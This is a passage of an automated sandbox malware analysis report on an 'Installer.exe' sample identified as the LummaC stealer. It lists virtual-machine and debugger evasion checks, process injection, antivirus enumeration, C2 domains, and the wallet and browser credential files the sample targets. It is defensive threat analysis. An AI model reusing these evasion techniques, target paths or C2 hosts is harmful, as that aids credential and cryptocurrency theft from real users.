                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004264B03_2_004264B0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00438CB03_2_00438CB0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041E5403_2_0041E540
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004405503_2_00440550
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041C5613_2_0041C561
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0042D57F3_2_0042D57F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004385C73_2_004385C7
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00411DC93_2_00411DC9
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00418DE63_2_00418DE6
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004115F13_2_004115F1
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004205833_2_00420583
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0042E64D3_2_0042E64D
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041966B3_2_0041966B
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004406003_2_00440600
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041DE103_2_0041DE10
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00417E1A3_2_00417E1A
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00402EC03_2_00402EC0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004066D03_2_004066D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00426ED03_2_00426ED0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004406903_2_00440690
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004146A03_2_004146A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00426EB03_2_00426EB0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004297403_2_00429740
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0040A7703_2_0040A770
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004287703_2_00428770
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00438F103_2_00438F10
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043D7103_2_0043D710
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00415F193_2_00415F19
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00436F2C3_2_00436F2C
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043A7D03_2_0043A7D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004227E03_2_004227E0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00416FF03_2_00416FF0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0040C7823_2_0040C782
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043AF803_2_0043AF80
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00408F903_2_00408F90
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004167903_2_00416790
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004307973_2_00430797
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041E7A03_2_0041E7A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043F7B23_2_0043F7B2
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 0035CFD6 appears 40 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 0034FAE4 appears 34 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 003580F8 appears 42 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 00350730 appears 38 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 00407FE0 appears 41 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 00414690 appears 95 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 0034FA60 appears 100 times
                Source: Installer.exeStatic PE information: invalid certificate
                Source: Installer.exe, 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe, 00000002.00000000.1672072820.00000000003CF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe, 00000003.00000002.3522502957.00000000003CF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe, 00000003.00000003.1672972885.00000000035EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Installer.exeStatic PE information: Section: .bss ZLIB complexity 1.0003360896915585
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/1@11/2
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004396A0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_004396A0
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                Source: Installer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Installer.exe, 00000003.00000003.1785946672.0000000005C4E000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1786173640.0000000005C51000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785844021.0000000005C4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Installer.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\Installer.exeFile read: C:\Users\user\Desktop\Installer.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: acgenral.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: acgenral.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: Installer.exeStatic PE information: real checksum: 0x97cc3 should be: 0x933b3
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0034FB83 push ecx; ret 0_2_0034FB96
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_0034FB83 push ecx; ret 2_2_0034FB96
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00440240 push eax; mov dword ptr [esp], DED9D88Bh3_2_00440245
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004464FA push edx; ret 3_2_00446500
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0044666E push cs; ret 3_2_00446682
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00446627 push cs; ret 3_2_00446682
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00430797 push 89240489h; mov dword ptr [esp], eax3_2_004307CB
                Source: C:\Users\user\Desktop\Installer.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\Installer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\Installer.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeWindow / User API: threadDelayed 9974Jump to behavior
                Source: C:\Users\user\Desktop\Installer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-20104
                Source: C:\Users\user\Desktop\Installer.exe TID: 7508Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Installer.exe TID: 7864Thread sleep count: 9974 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Installer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Installer.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Installer.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_00361F38 FindFirstFileExW,2_2_00361F38
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_00361FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00361FE9
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522783205.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522659058.0000000003512000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835883384.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\Installer.exeAPI call chain: ExitProcess graph end nodegraph_3-14591
                Source: C:\Users\user\Desktop\Installer.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043EBA0 LdrInitializeThunk,3_2_0043EBA0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0034F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0034F8E9
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0037A19E mov edi, dword ptr fs:[00000030h]0_2_0037A19E
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_00341FB0 mov edi, dword ptr fs:[00000030h]0_2_00341FB0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_00341FB0 mov edi, dword ptr fs:[00000030h]2_2_00341FB0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0035D8E0 GetProcessHeap,0_2_0035D8E0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0034F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0034F52D
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0034F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0034F8E9
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0034F8DD SetUnhandledExceptionFilter,0_2_0034F8DD
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_00357E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00357E30
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_0034F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0034F52D
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_0034F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0034F8E9
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_0034F8DD SetUnhandledExceptionFilter,2_2_0034F8DD
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_00357E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00357E30

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0037A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0037A19E
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Installer.exeMemory written: C:\Users\user\Desktop\Installer.exe base: 400000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
                Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Installer.exeCode function: EnumSystemLocalesW,0_2_0035D1BD
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00361287
                Source: C:\Users\user\Desktop\Installer.exeCode function: EnumSystemLocalesW,0_2_003614D8
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00361580
                Source: C:\Users\user\Desktop\Installer.exeCode function: EnumSystemLocalesW,0_2_003617D3
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,0_2_00361840
                Source: C:\Users\user\Desktop\Installer.exeCode function: EnumSystemLocalesW,0_2_00361915
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,0_2_00361960
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00361A07
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,0_2_00361B0D
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,0_2_0035CC15
                Source: C:\Users\user\Desktop\Installer.exeCode function: EnumSystemLocalesW,2_2_0035D1BD
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00361287
                Source: C:\Users\user\Desktop\Installer.exeCode function: EnumSystemLocalesW,2_2_003614D8
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00361580
                Source: C:\Users\user\Desktop\Installer.exeCode function: EnumSystemLocalesW,2_2_003617D3
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,2_2_00361840
                Source: C:\Users\user\Desktop\Installer.exeCode function: EnumSystemLocalesW,2_2_00361915
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,2_2_00361960
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00361A07
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,2_2_00361B0D
                Source: C:\Users\user\Desktop\Installer.exeCode function: GetLocaleInfoW,2_2_0035CC15
                Source: C:\Users\user\Desktop\Installer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_003500B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_003500B4
                Source: C:\Users\user\Desktop\Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Installer.exe, 00000003.00000003.1874516417.00000000035AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
                Source: Installer.exe, 00000003.00000002.3522659058.000000000353B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Installer.exe, 00000003.00000003.1973390326.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: er\MsMpeng.exe
                Source: C:\Users\user\Desktop\Installer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: Installer.exe PID: 7488, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: Installer.exe, 00000003.00000003.1835675481.00000000035AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Installer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
